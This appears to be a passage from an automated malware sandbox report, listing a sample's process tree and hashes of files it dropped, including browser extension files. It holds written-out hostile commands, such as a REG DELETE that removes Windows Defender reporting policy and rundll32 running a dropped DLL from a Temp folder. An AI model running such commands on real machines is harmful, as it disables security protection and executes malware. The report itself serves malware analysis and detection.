C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4640
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdrESRlZGEayfzFZZ"2⤵PID:208
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\gtrdzhFt\xFaWTlB.dll",#1 /CAsite_idene 3851211⤵PID:228
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\gtrdzhFt\xFaWTlB.dll",#1 /CAsite_idene 3851212⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4120 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRVNJXEqUfFueAuNO"3⤵PID:4836
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5820563aa61601b99640dc52b56606934
SHA1c98e40cb25dc86bd9a26dc4c52307d83904aad20
SHA256b356f8402bccbe1d463dc3d1ab3aa0b24d2c5bd25fbdfbf145f8047e307b16d0
SHA5121a57c61df5e36beb08c89e08e9f70e5ee4ad60c0bd0101e2ee40955cb0018d3e651ec03d5fa06a5f0ba1d3eac6558424431dd193785437f6a0bd80533fa9723b
-
Filesize
2KB
MD5a6910d6a2373ba6863f2993b4338afa5
SHA11828d2f6de7efda2959b9eb2863c71ee29177290
SHA2565db2829343c859c77c09b5e0adfdf66f79178004cefe7fc71505076f073d9271
SHA5129c537b19b3cd50eba24e2e6de07bdfdda06e8aa830197cba0fd490059b9babe4b259c39abd3f0526e546616b5aa6c2c4fab772bfca8ff0d66a628897cd8a8db7
-
Filesize
2KB
MD59117dafdd2bb026486ee19e389e711fe
SHA14497a733c32280a497c86abbabe9ef5944399f63
SHA2560495f8d0d4870ae9c49e5fe725710787b02a3999f201d0f660d717dc9c67f1ac
SHA512f9e7ff3aa00c5097d6606dc3c1aeaa5c3db58b4bc3adcbace3b1749c3662a2a9e38ab2aefe45d86816e6a1c0855621bd41046f4453f92a6b0ca7471c1899f53a
-
Filesize
2KB
MD504b1e285fe96a56f3333cb7f345b686e
SHA1eb6f1680332205843199567bd1554603220c3eb4
SHA256eccfc342579fcb5e202d8660a3f7a82187c38e950a6172585a11c0fdaeb9dadb
SHA5129eaa077f5f2a13f76b56f4dba5584b91bde42282568c9ffab32909d9b2b57f0859f9d5192f1113483ebb5bd41be644b74bb6edc8e766c5667be1a96c297be01e
-
Filesize
1.1MB
MD552950aa161661ab3c389e7c6aa857d9d
SHA17dd3466733e90965f82fd7e23c6d7e62c0702520
SHA256e8d66953ffd37ab17d1de509faa4d84d52324c1140ba509147c4d6f2cd3353a8
SHA51250f67956873708c6fcf8b18b53fff310b9a9cd8e3dd52b95ab55c16a8ee6ad3e17979c30afdbbd118b85ec39255df0942a28930b676b5761c9d4bf50ca56cd7c
-
Filesize
2KB
MD5bbd4f4ba42ebf97bd27ebe70e4c86fc2
SHA1848bebf248b7cc66aff3c548f9261d41a0a78a78
SHA256d884eea9ed9627e2e9497d2dd7514829ead90d68c51a64c64bee2c0f0d4f938d
SHA512938ee0c32260f62e54bbd42a5ac269f05a104a7682773ce14dd6dfc77f8ce42a91aae1c6eefe2bf5adf082367091d8364f67a369beb55b64719abb9e5e42994d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD56620c321bacf5cb21fe394749c75c6a1
SHA17a74e8b445dad2c16e57853e9b9c1276f5c55967
SHA256b03d67267432e380eb0a466ea0dc3ad1789dd58ff642019d25b2f294b9abbaf4
SHA5121b759367c0d32a1a4fbf1db84c80131e92ac781c5bc3d13eb78e39b04499fb17e8bc38d4c8258bc0a750367794a0c009daab73a71cf3ac757af805136dabaf23
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5ceef4c2b4b91309c80a60922b34ff06d
SHA1ded9b884695dc6d265b7f37ddf0b0cc398e52a10
SHA256346bf1bf0dad1ac52d35d1481a742ddc4ca1b51655c0d321012752cac471336d
SHA512cde46afcb6b1a1733a2bd70cf5407d08f8ebed9d9db05ca43ae4ce31d61e500a347b9833635744da59da799a8501dca1f7dae7dd6d5b2088f861d79131e850d3
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.1MB
MD5425129e52ea578b1b22c0ed7b9979b54
SHA1619b1b4dd342ca117299b3f2ad050325aa73e8c6
SHA25638c1abecc090fa7bf8c01a12a82accf3e7a7a0ed10025303a11f9c3439b1d238
SHA51242b19b825dd631ec7a401349ab6c11a51a3524dbdb828de37b4072a212e714fa7056dd64417ac7cb6ad1451ba3e420e1f5117048e3389538bb6c0e872224e9d3
-
Filesize
6.1MB
MD5425129e52ea578b1b22c0ed7b9979b54
SHA1619b1b4dd342ca117299b3f2ad050325aa73e8c6
SHA25638c1abecc090fa7bf8c01a12a82accf3e7a7a0ed10025303a11f9c3439b1d238
SHA51242b19b825dd631ec7a401349ab6c11a51a3524dbdb828de37b4072a212e714fa7056dd64417ac7cb6ad1451ba3e420e1f5117048e3389538bb6c0e872224e9d3
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD57376e770c80d310c47b2d37f85eba668
SHA147ec533486a0e578bcae49608a332251a8489e11
SHA256ebd3aff54511336f6d21d8980eac5fff5ca1cee158dd004b63299725e963987d
SHA51296eae9bddaddbbe6e7764b6ec09fcc5448a10335e7f90a1c2a35054b5baccf305747a73b235a0a848bbc5fa4440e2f8fac4e0792ad5938b752c49dc5f5d2f0c9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5b519e529850a082fd7d59b929028177e
SHA1492d580057fbb520e28a005e58a8609bb11b086a
SHA25694840908a77109e91e9f5c626ff53cd78e435ff2fbc9c7e1b109a99142850a82
SHA5126e1cb22a5dd8d12ea56402efd84abbde2515e410528ce5bd19ad5468cddd335a29ab8e9ff7e009ab58dd19ff3f924b35e0ba35130a2df2b9474f1811519e6686
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6KB
MD54e1a83e7759073d56e258b4a910cf62e
SHA11db40e06606e1d51dda2459df44bfa638770f2f9
SHA256bd9a49eaf39752f8fe63ede63738e3f03c5f7c6ab2ee1ea4e6f11b057e788b29
SHA5120dbaf9bb84b49661881dc463c5f508da01a3d75fbf0385171f64a13c3eea332396e02c95bd037dfbda20f12e0a63c739077b2cab2f2f2be8683122a0af90b482
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732